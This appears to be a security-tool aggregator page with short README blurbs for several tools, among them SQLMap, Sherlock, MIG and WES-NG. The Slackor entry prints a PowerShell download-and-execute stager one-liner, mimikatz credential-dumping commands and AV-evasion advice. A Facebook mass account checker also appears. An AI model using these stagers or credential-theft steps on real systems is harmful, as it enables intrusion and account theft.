image
WES-NG is a tool based on the output of Windows’ systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported. Usage Obtain the latest database of vulnerabilities by executing the command wes.py –update . Use Windows’ built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost , and redirect this to a file: systeminfo > systeminfo.txt Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt . WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available. As the data provided by Microsoft is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to deal with this. For an overview of all available parameters, check CMDLINE.md . Collector This GitHub repository regularly updates the database of vulnerabilities, so running wes.py with the –update parameter gets the latest version. If manual generation of the .csv file with hotfix information is required, use the scripts from the /collector folder to compile the database. Read the comments at the top of each script and execute them in the order as they are listed below. Executing these scripts will produce CVEs.csv. The WES-NG collector pulls information from various sources: Microsoft Security Bulletin Data: KBs for older systems [1] MSRC: The Microsoft Security Update API of the Microsoft Security Response Center (MSRC): Standard source of information for modern Microsoft Updates [2] NIST National Vulnerability Database (NVD): Complement vulnerabilities with Exploit-DB links [3] These are combined into a single .csv file which is compressed and hosted in this GitHub repository. Rationale I developed WES-NG because while GDSSecurity’s Windows-Exploit-Suggester worked excellently for operating systems in the Windows XP and Windows Vista era, GDSSecurity’s Windows-Exploit-Suggester does not work for operating systems like Windows 10 and vulnerabilities published in recent years. This is because Microsoft replaced the Microsoft Security Bulletin Data Excel file [1] on which GDSSecurity’s Windows-Exploit-Suggester is fully dependent, by the MSRC API [2]. The Microsoft Security Bulletin Data Excel file has not been updated since Q1 2017, so later operating systems and vulnerabilities cannot be detected. Thanks @gdssecurity , for this great tool which has served many of us for so many years! Bugs Bugs can be submitted via the Issues page For false positives in results, please read the Eliminating false positives page at the Wiki first. In case that doesn’t significantly reduce the number of false positives, follow the steps at the Report false positives page on the Wiki Changelog See CHANGELOG.md Improvements Add support for NoPowerShell ‘s Get-SystemInfo cmdlet output Add support for wmic qfe output together with support for parameters to manually specify the operating system Add support for alternative output formats of systeminfo (csv, table) More testing on the returned false positive vulnerabilities – see also the wiki Add support for Itanium architecuture References [1] https://www.microsoft.com/download/details.aspx?id=36982 [2] https://portal.msrc.microsoft.com/en-us/developer [3] https://nvd.nist.gov/vuln/data-feeds Authored by Arris Huijgen ( @bitsadmin – https://github.com/bitsadmin/ ) Download Wesng

image
Facebook Mass Account Checker Simple Installation : apt install git apt install php git clone https://github.com/fdciabdul/fbchecker cd fbchecker php fbcheck.php Usage php fbcheck.php target.txt Download Fbchecker

image
A Golang implant that uses Slack as a command and control channel. This project was inspired by Gcat and Twittor . This tool is released as a proof of concept. Be sure to read and understand the Slack App Developer Policy before creating any Slack apps. Setup Note: The server is written in Python 3 For this to work you need: A Slack Workspace Register an app with the following permissions: channels:read channels:history channels:write files:write:user files:read Create a bot This repo contains five files: install.sh Installs dependancies setup.py The script to create the slack channels, database, and implant server.py The Slackor server, designed to be ran on Linux template.go Template for the generated implant requirements.txt Python dependencies (installed automatically) To get started: Run install.sh Run setup.py Supply the _ OAuth Access Token _ and _ Bot User OAuth Access Token _ from your app After running the script successfully, a file agent.exe will be created. It will be a 64bit Go binary packed with UPX. After starting server.py on a Linux host, execute agent.exe on your target Windows host. Run the “stager” module to generate a one-liner and other droppers. powershell.exe iwr [URL] -o C:UsersPublic[NAME].exe; forfiles.exe /p c:windowssystem32 /m svchost.exe /c C:UsersPublic[NAME]; timeout 2; del C:UsersPublic[NAME].exe This will execute InvokeWebRequest(PS v.3+) to download the payload, execute it using a LOLBin , and then delete itself once killed. This is a working example but the command can tweaked to use another download method or execution method. Usage Type “help” or press [TAB] to see a list of available commands. type “help [COMMAND]” to see a description of that command. (Slackor) Help – Displays help menu interact – Interact with an agent list – List all registered agents remove – kill and remove an agent revive – Sends a signal to all agents to re-register with the server stager – Generates a one-liner to download an execute the implant quit – Quit the program wipefiles – Deletes all uploaded files out of Slack Once an agent checks in, you can interact with it. Use “interact [AGENT] to enter into an agent prompt. Type “help” or press [TAB] to see a list of available commands. (Slackor:AGENT) back – Return to the main menu beacon – change the amount of time between each check-in by an agent (default is 5 seconds) bypassuac – Attempts to spawn a high integrity agent cleanup – Removes persistence artifacts clipboard – Retreives the contents of the clipboard defanger – Attempts to de-fang Windows Defender download – Download a file from the agent to the Slackor server duplicate – Causes the agent to spawn another invocation of itself getsystem – Spawns an agent as NTAUTHORITY/SYSTEM help – Displays help menu keyscan – Starts a keylogger on the agent kill – Kill the agent minidump – Dumps memory from lsass.exe and downloads it persist – Creates persistence by implanting a binary in an ADS samdump – Attempts to dump the SAM file for offline hash extraction screenshot – Takes a screenshot of the desktop and retrieves it shellcode – Executes x64 raw shellcode sleep – Cause the agent to sleep once (enter time in seconds) sysinfo – Displays the current user, OS version, system architecture, and number of CPU cores upload – Upload a file to the agent from the Slackor server wget – Pull down arbitrary files over HTTP/HTTPS OPSEC Considerations Command output and downloaded files are AES encrypted in addition to TLS transport encryption. Modules will warn you before performing tasks that write to disk. When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host. Here are several OPSEC safe commands that will NOT execute cmd.exe: cat – prints file content cd – change directory hostname – Displays the name of the host ifconfig – Displays interface information ls – list directory contents mkdir – Creates a directory pwd – prints the current working directory rm – removes a file rmdir – removes a directory whoami / getuid – prints the current user Credits https://github.com/EgeBalci – Functions adapted from HERCULES and EGESPLOIT https://github.com/SaturnsVoid – Keylogger adapted from GoBot2 https://github.com/vyrus001 – x64 shellcode execution shellGo Crypto functions adopted from https://www.golang123.com/topic/1686 Persistence idea from Enigma0x3 Minidump adoped from Merlin , credit to C-Sto Screenshot code from kbinani Clipboard code from atotto Stager generator from hlldz UAC bypass by winscripting.blog Lulzbin find by @vector_sec Countless threads on StackOverflow Thanks to impacket for dumping hashes from SAM/SYS/SECURITY reg hives. LSASS dump credential extraction made possbile using pypykatz by skelsec Future goals DOSfuscation Reflectively load DLL/PE – https://github.com/vyrus001/go-mimikatz Execute C# assemblies in memory – https://github.com/lesnuages/go-execute-assembly Source code obfuscation https://github.com/unixpickle/gobfuscate FAQ: Is this safe to use for red teams/pentesting? Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. Anyone who acquires a copy of the agent could reverse engineer it and extract the API keys and the AES secret key. Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. For this reason, it is not recommended to re-use infrastructure against multiple organizations. What about Mimikatz? The implant does not have in-memory password dumping functionality. If you need logonPasswords, you can try the following: (Slackor: AGENT)minidump THis will automically extract passwords with Pypykatz. Alternatively, you can use Mimikatz on Windows. >mimikatz.exe mimikatz # sekurlsa::Minidump lsassdump.dmp mimikatz # sekurlsa::logonPasswords Is it cross-platform? Not yet. It has not been fully tested on a variety of systems. The server was designed to run on Kali Linux and the agent on Windows 10. How well does it scale? Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use. Is it vulnerable to standard beacon analysis? Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are recieved. Why did you do [x] when a better way to do it is [y]? I tried my best. PRs are encouraged 🙂 It gets caught by AV! The built-in HTA stager is created by SpookFlare which is based on Demiguise . If you want your droppers to not get snagged you probably want to go custom. The built in droppers are just there to get you started. Download Slackor

image
Software to identify the different types of hashes used to encrypt data and especially passwords. Encryption formats supported: ADLER-32 CRC-32 CRC-32B CRC-16 CRC-16-CCITT DES(Unix) FCS-16 GHash-32-3 GHash-32-5 GOST R 34.11-94 Haval-160 Haval-192 110080 ,Haval-224 114080 ,Haval-256 Lineage II C4 Domain Cached Credentials XOR-32 MD5(Half) MD5(Middle) MySQL MD5(phpBB3) MD5(Unix) MD5(WordPress) MD5(APR) Haval-128 MD2 MD4 MD5 MD5(HMAC(WordPress)) NTLM RAdmin v2.x RipeMD-128 SNEFRU-128 Tiger-128 MySQL5 – SHA-1(SHA-1($pass)) MySQL 160bit – SHA-1(SHA-1($pass)) RipeMD-160 SHA-1 SHA-1(MaNGOS) Tiger-160 Tiger-192 md5($pass.$salt) – Joomla SHA-1(Django) SHA-224 RipeMD-256 SNEFRU-256 md5($pass.$salt) – Joomla SAM – (LM_hash:NT_hash) SHA-256(Django) RipeMD-320 SHA-384 SHA-256 SHA-384(Django) SHA-512 Whirlpool And more… Encryption algorithms that can not be differentiated unless they have been decrypted, so the efficiency of the software also depends on the user’s criteria. Download Hash-Identifier

image
MIG is Mozilla’s platform for investigative surgery of remote endpoints. Quick Start w/ Docker You can spin up a local-only MIG setup using docker. The container is not suitable for production use but lets you experiment with MIG quickly, providing a single container environment that has most of the MIG components available. To pull from Docker Hub: $ docker pull mozilla/mig $ docker run -it mozilla/mig Or, if you have the source checked out in your GOPATH you can build your own image: $ cd $GOPATH/src/github.com/mozilla/mig $ docker build -t mozilla/mig:latest . $ docker run -it mozilla/mig Once inside the container, you can use the MIG tools to query a local agent, as such: [email protected]:~$ /go/bin/mig file -t all -path /usr/bin -sha2 5c1956eba492b2c3fffd8d3e43324b5c477c22727385be226119f7ffc24aad3f 1 agents will be targeted. ctrl+c to cancel. launching in 5 4 3 2 1 GO Following action ID 7978299359234. 1 / 1 [=========================================================] 100.00% 0/s4s 100.0% done in 3.029105958s 1 sent, 1 done, 1 succeeded ed11f485244a /usr/bin/wget [lastmodified:2016-07-05 15:32:42 +0000 UTC, mode:-rwxr-xr-x, size:419080] in search ‘s1’ 1 agent has found results To explore the capabilities of MIG, take a look at the CheatSheet . What is this? MIG is composed of agents installed on all systems of an infrastructure that are be queried in real-time to investigate the file-systems, network state, memory or configuration of endpoints. Capability | Linux | MacOS | Windows —|—|—|— file inspection | yes | yes | yes network inspection | yes | yes | (partial) memory inspection | yes | yes | yes vuln management | yes | (planned) | (planned) log analysis | (planned) | (planned) | (planned) system auditing | yes | (planned) | (planned) Imagine it is 7am on a saturday morning, and someone just released a critical vulnerability for your favorite PHP application. The vuln is already exploited and security groups are releasing indicators of compromise (IOCs). Your weekend isn’t starting great, and the thought of manually inspecting thousands of systems isn’t making it any better. MIG can help. The signature of the vulnerable PHP app (the md5 of a file, a regex, or just a filename) can be searched for across all your systems using the file module. Similarly, IOCs such as specific log entries, backdoor files with md5 and sha1/2/3 hashes, IP addresses from botnets or byte strings in processes memories can be investigated using MIG. Suddenly, your weekend is looking a lot better. And with just a few commands, thousands of systems will be remotely investigated to verify that you’re not at risk. MIG agents are designed to be lightweight, secure, and easy to deploy so you can ask your favorite sysadmins to add it to a base deployment without fear of breaking the entire production network. All parameters are built into the agent at compile time, including the list and ACLs of authorized investigators. Security is enforced using PGP keys, and even if MIG’s servers are compromised, as long as our keys are safe on your investigator’s laptop, no one will break into the agents. MIG is designed to be fast, and asynchronous. It uses AMQP to distribute actions to endpoints, and relies on Go channels to prevent components from blocking. Running actions and commands are stored in a Postgresql database and on disk cache, such that the reliability of the platform doesn’t depend on long-running processes. Speed is a strong requirement. Most actions will only take a few hundreds milliseconds to run on agents. Larger ones, for example when looking for a hash in a big directory, should run in less than a minute or two. All in all, an investigation usually completes in between 10 and 300 seconds. Privacy and security are paramount. Agents never send raw data back to the platform, but only reply to questions instead. All actions are signed by GPG keys that are not stored in the platform, thus preventing a compromise from taking over the entire infrastructure. Technology MIG is built in Go and uses a REST API that receives signed JSON messages distributed to agents via RabbitMQ and stored in a Postgres database. It is: Massively Distributed means Fast. Simple to deploy and Cross-Platform. Secured using OpenPGP. Respectful of privacy by never retrieving raw data from endpoints. Check out this 10 minutes video for a more general presentation and a demo of the console interface. MIG was recently presented at the SANS DFIR Summit in Austin, Tx. You can watch the recording below: Discussion Join #mig on irc.mozilla.org (use a web client such as mibbit ). Documentation All documentation is available in the ‘doc’ directory and on http://mig.mozilla.org . Concepts & Internal Components Installation & Configuration Download Mig

image
Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It’s based on project Winbagility . Files which might be helpful: INSTALL.md : how to install icebox. BUILD.md : how to build icebox. Demo Project Organisation fdp : Fast Debugging Protocol sources icebox : Icebox sources icebox : Icebox lib (core, os helpers, plugins…) icebox_cmd : Program that test several features samples : Bunch of examples winbagility : stub to connect WinDBG to FDP virtualbox : VirtualBox sources patched for FDP. Getting Started Some sample have been written in samples folder . You can build them with these instructions after you installed the requirements . If your using a Windows guest you might want to set the environement variable _NT_SYMBOL_PATH to a folder that contains your guest’s pdb. Please note that icebox setup will fail if it does not find your guest’s kernel’s pdb. vm_resume: vm_resume just pause then resume your VM. cd icebox/bin/$ARCH/ ./vm_resume nt_writefile: nt_writefile breaks when a process calls ntdll!NtWriteFile, and dumps what’s written in a file on your host in the current directory. cd icebox/bin/$ARCH/ ./nt_writefile heapsan: heapsan breaks ntdll memory allocations from a process and add padding before & after every pointer. It is still incomplete and doesn’t do any checks yet. cd icebox/bin/$ARCH/ ./heapsan wireshark: wireshark breaks when ndis driver reads or sends network packets and creates a wireshark trace (.pcapng). Each packet sent is associated to a callstack from kernel land to userland if necessary. cd icebox/bin/$ARCH/ ./wireshark Download Icebox

image
SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Features Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band . Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns . Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack . Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables . This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. Installation You can download the latest tarball by clicking here or latest zipball by clicking here . Preferably, you can download sqlmap by cloning the Git repository: git clone –depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform. Usage To get a list of basic options and switches use: python sqlmap.py -h To get a list of all options and switches use: python sqlmap.py -hh You can find a sample run here . To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user’s manual . Demo Links Homepage: http://sqlmap.org Download: .tar.gz or .zip Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom Issue tracker: https://github.com/sqlmapproject/sqlmap/issues User’s manual: https://github.com/sqlmapproject/sqlmap/wiki Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ Twitter: @sqlmap Demos: http://www.youtube.com/user/inquisb/videos Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots Translations Bulgarian Chinese Croatian French Greek Indonesian Italian Japanese Portuguese Spanish Turkish Download SQLMap v1.3.7

image
Find usernames across social networks Installation NOTE : Python 3.6 or higher is required. # clone the repo $ git clone https://github.com/sherlock-project/sherlock.git # change the working directory to sherlock $ cd sherlock # install python3 and python3-pip if not exist # install the requirements $ pip3 install -r requirements.txt Usage $ python3 sherlock.py –help usage: sherlock.py [-h] [–version] [–verbose] [–rank] [–folderoutput FOLDEROUTPUT] [–output OUTPUT] [–tor] [–unique-tor] [–csv] [–site SITE_NAME] [–proxy PROXY_URL] [–json JSON_FILE] USERNAMES [USERNAMES …] Sherlock: Find Usernames Across Social Networks (Version 0.6.4) positional arguments: USERNAMES One or more usernames to check with social networks. optional arguments: -h, –help show this help message and exit –version Display version information and dependencies. –verbose, -v, -d, –debug Display extra debugging information and metrics. –rank, -r Present websites ordered by their Alexa.com global rank in popularity. –folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT If using multiple usernames, the output of the results will be saved at this folder. –output OUTPUT, -o OUTPUT If using single username, the output of the result will be saved at this file. –tor, -t Make requests over TOR; increases runtime; requires TOR to be installed and in system path. –unique-tor, -u Make requests over TOR with new TOR circuit after each request; increases runtime; requires TOR to be installed and in system path. –csv Create Comma-Separated Values (CSV) File. –site SITE_NAME Limit analysis to just the listed sites. Add multiple options to specify more than one site. –proxy PROXY_URL, -p PROXY_URL Make requests over a proxy. e.g. socks5://127.0.0.1:1080 –json JSON_FILE, -j JSON_FILE Load data from a JSON file or an online, valid, JSON file. –print-found Prints only found messages. Errors, and invalid username errors will not appear. For example, run python3 sherlock.py user123 , and all of the accounts found will be stored in a text file with the username (e.g user123.txt ). Docker Notes If you have docker installed you can build an image and run this as a container. docker build -t mysherlock-image . Once the image is built sherlock can be invoked by running the following: docker run –rm mysherlock-image user123 The optional –rm flag removes the container filesystem on completion to prevent cruft build-up. See https://docs.docker.com/engine/reference/run/#clean-up—rm One caveat is the text file that is created will only exist in the container so you will not be able to get at that. Or you can simply use “Docker Hub” to run sherlock : docker run theyahya/sherlock user123 Adding New Sites Please look at the Wiki entry on adding new sites to understand the issues. Tests If you are contributing to Sherlock, then Thank You! Before creating a pull request with new development, please run the tests to ensure that all is well. It would also be a good idea to run the tests before starting development to distinguish problems between your environment and the Sherlock software. The following is an example of the command line to run all the tests for Sherlock. This invocation hides the progress text that Sherlock normally outputs, and instead shows the verbose output of the tests. $ python3 -m unittest tests.all –buffer –verbose Note that we do currently have 100% test coverage. Unfortunately, some of the sites that Sherlock checks are not always reliable, so it is not uncommon to get response errors. Download Sherlock

image
Using 0xsp mongoose you will be able to scan a targeted operating system for any possible way for privilege escalation attacks, starting from collecting information stage until reporting information through 0xsp Web Application API. user will be able to scan different Linux os system at the same time with high performance, without spending time looking inside the terminal or text file for what is found, mongoose shorten this way by allowing you to send this information directly into web application friendly interface through easy API endpoint. project is divided into two sections server & agent . server has been coded with PHP( codeigniter ) you need to install this application into your preferred environment, you can use it online or on your localhost. user is free to choice .also contribution to enhancing features are most welcomed. Agent has been coded as ELF with Lazarus Free Pascal will be released with (32, 64 bit) while executing Agent on targeted system with all required parameters. user is free to decide whether willing to communicate with Server App to store results and explore them easily . or he can also run this tool without Web API Connection. Agent Usage make sure to give it executable permission chmod +x agent ./agent -h (display help instructions) -k –check kernel for common used privilige escalations exploits. -u –Getting information about Users , groups , releated information. -c –check cronjobs. -n –Retrieve Network information,interfaces …etc. -w –Enumerate for Writeable Files , Dirs , SUID , -i –Search for Bash,python,Mysql,Vim..etc History files. -f –search for Senstive config files accessible & private stuff. -o –connect to 0xsp Web Application. -p –Show All process By running under Root,Check For Vulnerable Packages. -e –Kernel inspection Tool, it will help to search through tool databases for kernel vulnerabilities. -x –secret Key to authorize your connection with WebApp API (default is 0xsp). -a –Display README. Server Web App (must be like this : http://host/0xsp/ ) make sure to have at least php 5.6 or above requires mysql 5.6 make sure to add Web application on root path / with folder name 0xsp as [ http://localhost/0xsp/] , Agent will not connect to it in case not configured correctly . the agent will connect only as following case : ./agent {SCAN OPTION} -o localhost -x secretkey Examples With WebApi ./agent -c -o localhost -x 0xsp { enumerate for CRON Tasks and Transfer results into Web Api} ./agent -e -o localhost -x 0xsp { intelligent Exploits Detector } ./agent -c -e localhost -x 0sxp { will run two scans together and send found results directly } ./agent -m -o 10.10.13.1 -x 0xsp { RUN all Scans together and export it to Web API} Examples Without WebApi ./agent -c -k -p { this will run 3 scans at the same time with out sending results into Web Api } Agent Features High performance , stability , Output results Generated while executing no delays Ability to execute most of functions with intelligent techniques . results are being sent to Quick Web API Exception Handling . inbuilt Json Data set for publicly disclosed Exploits . Fast As Mongoose Download 0xsp-Mongoose

image
This script extracts all the labels found in the LST file that is given as the script’s single argument. An x64dbg database is created in the current directory based on the extracted labels. The LST file can be generated in IDA from the File menu: Produce file -> Create LST file… Example $ python3 lst2x64dbg.py sample.lst ghidra2x64dbg This script extracts all the labels found in the CSV file that is given as the script’s single argument. An x64dbg database is created in the current directory based on the extracted labels. The imagebase value must be supplied. The CSV file can be generated in Ghidra from the Window menu by selecting Symbol Table In the symbol table window that opens, sort the data by the Location column. Then select all symbols that are _ not _ external locations. With the desired symbols selected, right click and select: Export -> Export to CSV… Name this file .csv Example $ python3 ghidra2x64dbg.py -i 400000 sample.csv The imagebase value can be found at the very top of the disassembly panel in the CodeBrowser window. It’s part of the DOS header. ToDo Convert to package with console script Download Lst2X64Dbg